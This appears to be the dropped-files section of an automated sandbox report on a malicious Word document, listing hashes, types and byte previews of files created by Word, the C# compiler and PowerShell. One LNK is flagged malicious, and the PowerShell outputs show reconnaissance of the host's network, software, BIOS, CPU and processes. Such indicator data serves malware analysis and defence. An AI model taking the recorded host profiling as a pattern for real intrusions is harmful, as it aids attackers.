                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.g.h.x.i.b.c.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.g.h.x.i.b.c.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5120
                                                                                                                                                                Entropy (8bit):3.782862765791784
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:65oPhmKraYZkH8KTibUyDkwjj0JCC+CFSlwYac1ulva3Dq:TDaAkHHoVk8NCu29K
                                                                                                                                                                MD5:6DE7B305B73291E9287C3717BD6A16C5
                                                                                                                                                                SHA1:6E31A7DB1B0066ABD81E6172283192563871A430
                                                                                                                                                                SHA-256:738E1980DFB7F51FD25FC21DF57521892807C7F3D106A3F7DC94EFFEE3DFD311
                                                                                                                                                                SHA-512:EBBFA0B6759477005CF190B1CE76DC53D609996A46BEDD137C3384188A4FBE8C739D5E5467918D49342DF811E4035DA88EF7BCB85CEB3DAE3F4CA19323BA2802
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:38 2022, mtime=Mon Jun 20 14:30:00 2022, atime=Mon Jun 20 14:29:46 2022, length=12519, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1060
                                                                                                                                                                Entropy (8bit):4.713563953429285
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:8DKylEjUCuElPCH2PNgTBYv5e+W8Y7XfnrrcjEjAJ/+aDmQriNDOTt5n4t2Y+xI/:8DKyligTdvnrAUAJv9yDOZz7aB6m
                                                                                                                                                                MD5:FFDA0DDBE2B3DA8AD196DAC8ED90E2F8
                                                                                                                                                                SHA1:0CA4381091C5243EA82A9A0E978659E607EFE28B
                                                                                                                                                                SHA-256:AB9997C0D51E894D09D9FFDF5B92485DA98BC7F5BB0EAF19681C26DFA2072388
                                                                                                                                                                SHA-512:99998D3DF46FC1E6853AFF2DB3016CA57C737B250AC453C5B3F5E815090971A0227FC66DE067B67865943C04C2D3C4DF0BB3F6B1F79F750E070ACB8601689E4E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:L..................F.... .....3..3..........~......0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...T.{....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..T.{.....S........................h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..T.{.....Y..............>.....#uk.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2..0...T.{ .WF0SLQ~1.DOC..P......hT..T.{....h.....................V$..W.F.0.S.l.Q.W.K.r.1...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\WF0SlQWKr1.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.W.F.0.S.l.Q.W.K.r.1...d.o.c.x.........:..,.LB.)...As...`.......X.......878411...........!a..%.H.VZAj...t............-..!a..%.H.VZAj...t............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82
                                                                                                                                                                Entropy (8bit):4.737525298622288
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:bDuMJlqY6e1KKpSmxW5jV7e1KKpSv:bCelK60jV0K6c
                                                                                                                                                                MD5:A99E348CE00D60BF0740FC84F6440532
                                                                                                                                                                SHA1:93DDF8193F7CDB75883B440ADF430D4725D62436
                                                                                                                                                                SHA-256:8900FF791ED7169F17EC3DAC3F09CEF9B82AAFF1D811203A9F91474D8E242CB7
                                                                                                                                                                SHA-512:F32FA8FEABB0E18717A4190B3A956B4EB9E93A7FF2094E6C8773DA04E14F876B63664DDD043F49D4279C2575E5442D9C48DA6A2B3BF8B2C93F11B3D907AB5A6D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[folders]..Templates.LNK=0..WF0SlQWKr1.docx.LNK=0..[misc]..WF0SlQWKr1.docx.LNK=0..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):162
                                                                                                                                                                Entropy (8bit):2.1312669291729662
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Rl/ZdMlplt9lqKljlRll9lqKhG1jf:RtZyzlQ+ZDI68r
MD5:27B019B5FB5D859CF77C85CAB51A0C15
SHA1:117279B09579725BD9FE2315F988DA2AB2CC7E91
SHA-256:4316A53A8F39D94F43B91DD31311AE5358F96A3A83614A9831904726790DE130
SHA-512:7A960D55BB1AA9C87C266BACC640E339710A5D30173E8CC0FE9A8D844DEB2487DF23205A9C9E9C86AD790F3BE84588F3AF47BEE2EE11303DB3896F5BE52E10D6
Malicious:false
Preview:.pratesh................................................p.r.a.t.e.s.h.........<...............$.......6C......................$.......6C......................H...
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6205
Entropy (8bit):3.7658377434195667
Encrypted:false
SSDEEP:96:InC6u6ZClp51MkvhkvCCtjXSlrHpAclrHpAR:D6u6k1IjiT3Ts
MD5:98D5033864AA64BAFA73B7CBAE26E3DF
SHA1:E14B46F11ED77F2C8771601D8051134AAE17794D
SHA-256:86CA636D3AA4CE708FC06F2D1C1D3E0DECD60A85BEDD5DF5795153F64692E2AE
SHA-512:A39EE007E153E3DA683621179E96429DF91B222349CA1472121B1791877DDE42B17A88A6E5781F0639088628C55B19187EC4ECCBC8F4221A68BB6C1A8361A477
Malicious:false
Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..t.Q..3..............t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..T.{.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..T.{.....Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny..T.{.....Y........................M.i.c.r.o.s.o.f.t.....V.1.....hT....Windows.@.......Ny..T.{.....Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..T.{.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..T.{.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.hT......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6205
Entropy (8bit):3.7658377434195667
Encrypted:false
SSDEEP:96:InC6u6ZClp51MkvhkvCCtjXSlrHpAclrHpAR:D6u6k1IjiT3Ts
MD5:98D5033864AA64BAFA73B7CBAE26E3DF
SHA1:E14B46F11ED77F2C8771601D8051134AAE17794D
SHA-256:86CA636D3AA4CE708FC06F2D1C1D3E0DECD60A85BEDD5DF5795153F64692E2AE
SHA-512:A39EE007E153E3DA683621179E96429DF91B222349CA1472121B1791877DDE42B17A88A6E5781F0639088628C55B19187EC4ECCBC8F4221A68BB6C1A8361A477
Malicious:false
Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..t.Q..3..............t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..T.{.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..T.{.....Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny..T.{.....Y........................M.i.c.r.o.s.o.f.t.....V.1.....hT....Windows.@.......Ny..T.{.....Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..T.{.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..T.{.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.hT......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.1312669291729662
Encrypted:false
SSDEEP:3:Rl/ZdMlplt9lqKljlRll9lqKhG1jf:RtZyzlQ+ZDI68r
MD5:27B019B5FB5D859CF77C85CAB51A0C15
SHA1:117279B09579725BD9FE2315F988DA2AB2CC7E91
SHA-256:4316A53A8F39D94F43B91DD31311AE5358F96A3A83614A9831904726790DE130
SHA-512:7A960D55BB1AA9C87C266BACC640E339710A5D30173E8CC0FE9A8D844DEB2487DF23205A9C9E9C86AD790F3BE84588F3AF47BEE2EE11303DB3896F5BE52E10D6
Malicious:false
Preview:.pratesh................................................p.r.a.t.e.s.h.........<...............$.......6C......................$.......6C......................H...
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):740
Entropy (8bit):2.690074337041514
Encrypted:false
SSDEEP:12:Q9lIaI5bUGiKcvGgRqFt1OtVdk3L69SmSQ9Y2Rfzq/O:Q9SP57Cun4ne6kmSy
MD5:2D7C93C04954AFD0CB251BFBD0A11854
SHA1:D5C16C79C018EA200482AB6A73FD39893445A07E
SHA-256:27AFCEECE3F01B5C116CF26FC4C29742D36EADCFA33676793354EC6BE14CFD14
SHA-512:CF4E70C658A67E7A4BB3ED54A10CB28B2B26D919B8447EE7A13DA98B02D2DCB3A8D10E246DD5B997E7D06CD07B9CDC9F5DA63921B963F500AE54AD6CB260E20D
Malicious:false
Preview:......N.a.m.e. . . . . . . . . . . . . . . . . . . . . . .I.n.t.e.r.f.a.c.e.D.e.s.c.r.i.p.t.i.o.n. . . . . . . . . . . . . . . . . . . . .i.f.I.n.d.e.x. .S.t.a.t.u.s. . . . . . . .M.a.c.A.d.d.r.e.s.s. . . . . . . . . . . . . .L.i.n.k.S.p.e.e.d.....-.-.-.-. . . . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-. .-.-.-.-.-.-. . . . . . . .-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.....E.t.h.e.r.n.e.t.0. . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .8.2.5.7.4.L. .G.i.g.a.b.i.t. .N.e.t.w.o.r.k. .C.o.n.n....... . . . . . .1.1. .U.p. . . . . . . . . . . .E.C.-.F.4.-.B.B.-.8.6.-.2.D.-.E.D. . . . . . . . . .1. .G.b.p.s.............
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):3870
Entropy (8bit):3.249508667315905
Encrypted:false
SSDEEP:48:/225dKC97CakmbraXwQxWZsxsfw/6S8hU2S92pMWd2cy9hu:/5CjaMLu
MD5:63F77FFDED3DB83178F6F16E0D838D8C
SHA1:5837B73682E9F56B5AD262DF33D658F769E137C3
SHA-256:9D1627DE4F5595F0C9AF05606390780BAB4DCF1E9A26823135511680A7E7385B
SHA-512:F488DD5843CED7CC33C7E23B7819D9FF906B0CEC2817DE88BB36380D862D9A75D395840919B3FD3C41B815CD63A58DFCA1CC4CE56E1A83D69797291CBDF69906
Malicious:false
Preview:..........D.H.C.P.E.n.a.b.l.e.d. . . . . . .:. .T.r.u.e.....I.P.A.d.d.r.e.s.s. . . . . . . . .:. .....D.e.f.a.u.l.t.I.P.G.a.t.e.w.a.y. .:. .....D.N.S.D.o.m.a.i.n. . . . . . . . .:. .....S.e.r.v.i.c.e.N.a.m.e. . . . . . .:. .k.d.n.i.c.....D.e.s.c.r.i.p.t.i.o.n. . . . . . .:. .M.i.c.r.o.s.o.f.t. .K.e.r.n.e.l. .D.e.b.u.g. .N.e.t.w.o.r.k. .A.d.a.p.t.e.r.....I.n.d.e.x. . . . . . . . . . . . .:. .0.........D.H.C.P.E.n.a.b.l.e.d. . . . . . .:. .F.a.l.s.e.....I.P.A.d.d.r.e.s.s. . . . . . . . .:. .{.1.9.2...1.6.8...2...3.,. .f.e.8.0.:.:.5.d.e.a.:.2.0.5.2.:.e.b.5.c.:.e.8.7.9.}.....D.e.f.a.u.l.t.I.P.G.a.t.e.w.a.y. .:. .{.1.9.2...1.6.8...2...1.}.....D.N.S.D.o.m.a.i.n. . . . . . . . .:. .....S.e.r.v.i.c.e.N.a.m.e. . . . . . .:. .e.1.i.e.x.p.r.e.s.s.....D.e.s.c.r.i.p.t.i.o.n. . . . . . .:. .I.n.t.e.l.(.R.). .8.2.5.7.4.L. .G.i.g.a.b.i.t. .N.e.t.w.o.r.k. .C.o.n.n.e.c.t.i.o.n.....I.n.d.e.x. . . . . . . . . . . . .:. .1.........D.H.C.P.E.n.a.b.l.e.d. . . . . . .:. .F.a.l.s.e.....I.P.A.d.d.r.e.s.s. . . .
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):34378
Entropy (8bit):2.914480319600237
Encrypted:false
SSDEEP:768:eklQvAws6dnB0iwK2WdVV0A1CueRGg3KLiJMlCiQiZlNIUTxuOmZrHlNL1flUstz:3H
MD5:E384B1F1B346CFB04FDAAA8A2472CE3C
SHA1:2D4F033F1CB1A5EB40C3C2BEC382AFC53113F579
SHA-256:D43B92E117AA2C6EE47FB37177E391A8DFA94341DD7364A6CB1E6F29D613D128
SHA-512:CAFF54CDB6B8E33A4BC1CEB4207B7108B79C6A21692FD52F1315CB312FB9ABA6DCD609679E459B5B3D44E05E41D0D61614BECA59A0884A090E959B6795ACFB6E
Malicious:false
Preview:......D.i.s.p.l.a.y.N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .D.i.s.p.l.a.y.V.e.r.s.i.o.n. .P.u.b.l.i.s.h.e.r. . . . . . . . . . . . . . . . . . .I.n.s.t..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .a.l.l.D..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .a.t.e. .....-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.-.-.-.-.-. .-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . .-.-.-.-..... . . . . . . . . . . . . .
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):358
Entropy (8bit):3.372235584566867
Encrypted:false
SSDEEP:6:QAjjs0oZ8ap2m+q8IKlIaIlwAipallefaCihJZoh/u:QAHPoZ72E8IKlIaYwAi8lLXhJZb
MD5:F731C49F9F7467B3BD31BD90037FC642
SHA1:747DC8CF070A92FE20B27FA6C0EB6BC4DF2EAECE
SHA-256:0F7236BB63EF86034F8C6F600036BCC69DB292165F66898288015CE3BC2F3385
SHA-512:3B91ED7547965DD6A9FC22C42D6715B6F2E5B1499648859C528B7BA0DD04E6A1FF19E6F2FA7E75A49262FAA7285BD86D23DDB6E35BB7FB596D5D955DF888B7E7
Malicious:false
Preview:..........S.M.B.I.O.S.B.I.O.S.V.e.r.s.i.o.n. .:. .4.G.H.P.S.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . .:. .A.N.3.C.B.....N.a.m.e. . . . . . . . . . . . . . .:. .V.M.W.7.1...0.0.V...1.8.2.2.7.2.1.4...B.6.4...2.1.0.6.2.5.2.2.2.0.....S.e.r.i.a.l.N.u.m.b.e.r. . . . . . .:. .M.8.E.5.X.5.3.B.1.9.....V.e.r.s.i.o.n. . . . . . . . . . . .:. .F.9.M.S.G.................
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):790
Entropy (8bit):3.1871763647552767
Encrypted:false
SSDEEP:24:QCGmYSGmDfUUMfg9I+kWQ+S9w8vw/+WiXyG:RGmYSGmQULu+Y+mzoHiX7
MD5:38455CF67591FE7AE72E0A4FDB8812ED
SHA1:6E226D757DEBDCAED8A0ED74837077D173D97F98
SHA-256:C16A198FFC883668C97EE508EE7384FA99DC4572D37219EC5F0F30B49C36AD2E
SHA-512:47772EA54A790DD12EC9B1F15D45B8DD1F357165A6DE9614D783B317E84855891E55F6CC88C09E3EF88E0746895183EC2055640DF8C72C6F27FD94C21D9E25DB
Malicious:false
Preview:..........C.a.p.t.i.o.n. . . . . . . . . . . . . . . . . . . .:. .I.n.t.e.l.6.4. .F.a.m.i.l.y. .6. .M.o.d.e.l. .8.5. .S.t.e.p.p.i.n.g. .7.....D.e.s.c.r.i.p.t.i.o.n. . . . . . . . . . . . . . . .:. .I.n.t.e.l.6.4. .F.a.m.i.l.y. .6. .M.o.d.e.l. .8.5. .S.t.e.p.p.i.n.g. .7.....N.u.m.b.e.r.O.f.C.o.r.e.s. . . . . . . . . . . . . .:. .4.....N.u.m.b.e.r.O.f.L.o.g.i.c.a.l.P.r.o.c.e.s.s.o.r.s. .:. .2.....N.a.m.e. . . . . . . . . . . . . . . . . . . . . . .:. .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . . . . . . . . . .:. .G.e.n.u.i.n.e.I.n.t.e.l.....S.y.s.t.e.m.C.r.e.a.t.i.o.n.C.l.a.s.s.N.a.m.e. . . .:. .W.i.n.3.2._.C.o.m.p.u.t.e.r.S.y.s.t.e.m.....V.e.r.s.i.o.n. . . . . . . . . . . . . . . . . . . .:. .................
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):278
Entropy (8bit):3.2097733620466897
Encrypted:false
SSDEEP:3:QZyrhldmfiAgGifvWy1S8lAN4HvovcA2P6pFltvWMolclUXF02vlduVnX1lSNz0s:QEYfdZ7yw0AyHwvcTo8MoGy1RWSrAvG
MD5:422B906819D2B3C825CD052B3A92DB20
SHA1:5AEC0D60923F29240E4A9115446B7C9408EA8A34
SHA-256:CC270C87AF59C8D94E75193D7E911C351947B76E6D5FB72C2DE619919F4F4E50
SHA-512:D75509A4F6D14846BC2A437DDF9F712EBF9B82C824BFA3207AE9B347EA13F4FB6295E6C064B16FEDF14B3F289C4E0410D41B71E0D9993C65772B1D00C427666C
Malicious:false
Preview:..........D.e.v.i.c.e.I.D. . . . . .:. .C.:.....D.r.i.v.e.T.y.p.e. . . . .:. .3.....P.r.o.v.i.d.e.r.N.a.m.e. .:. .....F.r.e.e.S.p.a.c.e. . . . .:. .3.3.8.7.9.9.2.8.8.3.2.....S.i.z.e. . . . . . . . . .:. .2.2.3.4.9.6.7.2.9.6.0.1.....V.o.l.u.m.e.N.a.m.e. . . .:. .................
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):82
Entropy (8bit):3.128876068320257
Encrypted:false
SSDEEP:3:QnlLl8JLl1LkolvklnV3+u6XSNlWZy49:QD8J0o2lnd3WZh9
MD5:78A0CF4A2D198D588E40BE2199E5EB0C
SHA1:1A32FF48A1AE722AA6358B7C023B8F219223CE51
SHA-256:1C0A8771B00DFD60C87B6CEB146899D9DA7055D6C41020021365C6515140E18F
SHA-512:7A71E34274429EE774F2E7D7FC9CA68F85A99AC6DDB30E5DD0C3AC6965DE9C57F0FF40AAF5123A9A7947A5B3C638DA13C2CBFA85D433434B2C2B8ED898C9AED2
Malicious:false
Preview:..1.9.2...1.6.8...2...3.....f.e.8.0.:.:.5.d.e.a.:.2.0.5.2.:.e.b.5.c.:.e.8.7.9.....
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):30022
Entropy (8bit):2.037231948083465
Encrypted:false
SSDEEP:96:X+Jak0v9tCeOD6sLMVDt/HV7GIix1dUu0kAudtOhNSvdIPMLF15PS:uZ0v9tV5Dt5g/0budtO2vdG4HhS
MD5:B476D700E24BDBA108DB584B36E7427C
                                                                                                                                                                SHA1:633ED5E1EA8534944FEBB9A858C2F5291CE7C949
                                                                                                                                                                SHA-256:0F94B98B364D7A2219FA5660F38E33031627F0DE60C02E2C5DE904C0DE70BA20
                                                                                                                                                                SHA-512:DB73CE72AA366C455599AEBE834F3B09E37B8A3873374AEDB780FD38279BCD4A90CF9F606057600905BAF1E94587C1364684662DFCEE8A4174AC69567222107F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......H.a.n.d.l.e.s. . .N.P.M.(.K.). . . . .P.M.(.K.). . . . . . .W.S.(.K.). . . . . .C.P.U.(.s.). . . . . .I.d. . .S.I. .P.r.o.c.e.s.s.N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....-.-.-.-.-.-.-. . .-.-.-.-.-.-. . . . .-.-.-.-.-. . . . . . .-.-.-.-.-. . . . . .-.-.-.-.-.-. . . . . .-.-. . .-.-. .-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . .2.0.8. . . . . . .1.1. . . . . .3.7.0.8. . . . . . .1.7.8.1.6. . . . . . . .0...2.7. . . .2.1.6.8. . . .1. .b.a.c.k.g.r.o.u.n.d.T.a.s.k.H.o.s.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . .1.0.9.1. . . . . . .3.1. . . . .1.9.4.0.0. . . . . . .5.1.6.7.2. . . . . . .2.0...5.5. . . .2.7.9.6. . . .1. .b.a.c.k.g.r.o.u.n.d.T.a.s.k.H.o.s.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . .1.8.0. . . . . . .
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3294
                                                                                                                                                                Entropy (8bit):3.264652836080392
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:v/J+IX/oW4l1pRP3rMuoW4XfxW4cl+/H5W4nMuqGWg6VpCjxNsl+lf9W4sVxA3Wx:QO4n4s4v8484TWg6VMjxNFY4sVGG4S
                                                                                                                                                                MD5:8160DE0BD461AE311225142315AB52A4
                                                                                                                                                                SHA1:7E7D156CB4F2D2C5FF1FABFFCE470FD28C17DD82
                                                                                                                                                                SHA-256:8F2799938D4C28BFB792715FB7898A831B4F1772E38327A122BABF78D3BCC62C
                                                                                                                                                                SHA-512:2F88040CA2DF227D81E5C8BFCB3B5859E47BFFC9FCA70475C4502B14199817B69DD41186A9B0D5A7D6017AB877D54EA9BA2DC4868573539AB46FB1054D5BC553
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.........._._.G.E.N.U.S. . . . . . . . . . . . . . .:. .2....._._.C.L.A.S.S. . . . . . . . . . . . . . .:. .W.i.n.3.2._.P.h.y.s.i.c.a.l.M.e.m.o.r.y....._._.S.U.P.E.R.C.L.A.S.S. . . . . . . . . .:. .C.I.M._.P.h.y.s.i.c.a.l.M.e.m.o.r.y....._._.D.Y.N.A.S.T.Y. . . . . . . . . . . . .:. .C.I.M._.M.a.n.a.g.e.d.S.y.s.t.e.m.E.l.e.m.e.n.t....._._.R.E.L.P.A.T.H. . . . . . . . . . . . .:. .W.i.n.3.2._.P.h.y.s.i.c.a.l.M.e.m.o.r.y...T.a.g.=.".P.h.y.s.i.c.a.l. .M.e.m.o.r.y. .0."....._._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. . . . . .:. .3.6....._._.D.E.R.I.V.A.T.I.O.N. . . . . . . . . .:. .{.C.I.M._.P.h.y.s.i.c.a.l.M.e.m.o.r.y.,. .C.I.M._.C.h.i.p.,. .C.I.M._.P.h.y.s.i.c.a.l.C.o.m.p.o.n.e.n.t.,. .C.I.M._.P.h.y.s.i.c.a.l.E.l.e.m.e.n.t.......}....._._.S.E.R.V.E.R. . . . . . . . . . . . . .:. .D.E.S.K.T.O.P.-.7.1.6.T.7.7.1....._._.N.A.M.E.S.P.A.C.E. . . . . . . . . . .:. .r.o.o.t.\.C.I.M.V.2....._._.P.A.T.H. . . . . . . . . . . . . . . .:. .\.\.D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.r.o.o.t.\.C.I.M.V.2.:.W.i.n.3.2._.P.
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):430
                                                                                                                                                                Entropy (8bit):3.245935984288243
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Q7eYKNLGe2m2OOVEflIavcF/B2IHcyHiQ2lYpvNlEGa3jAgP:Q7elLp2sS0lIakFX8yHBCMNlFC
                                                                                                                                                                MD5:584BF9F76ACD21C5FADE3C679D0D3AA5
                                                                                                                                                                SHA1:39698C73A5800937C9CA1E8D51D393292066549A
                                                                                                                                                                SHA-256:DC46DEBCB09B1FE45DE600CEB0B8DFC380F408EB2EFA99A4620C1A331C1DE56E
                                                                                                                                                                SHA-512:98DCB11F44157BC693D1236B60AB912E7EB67360113FD5B617E70F979E497A4EE0F653F52C65D4DBDF731148D2C922906CFFB7FBD818CF6D36CFC5C9E6280F4C
                                                                                                                                                                Malicious:false
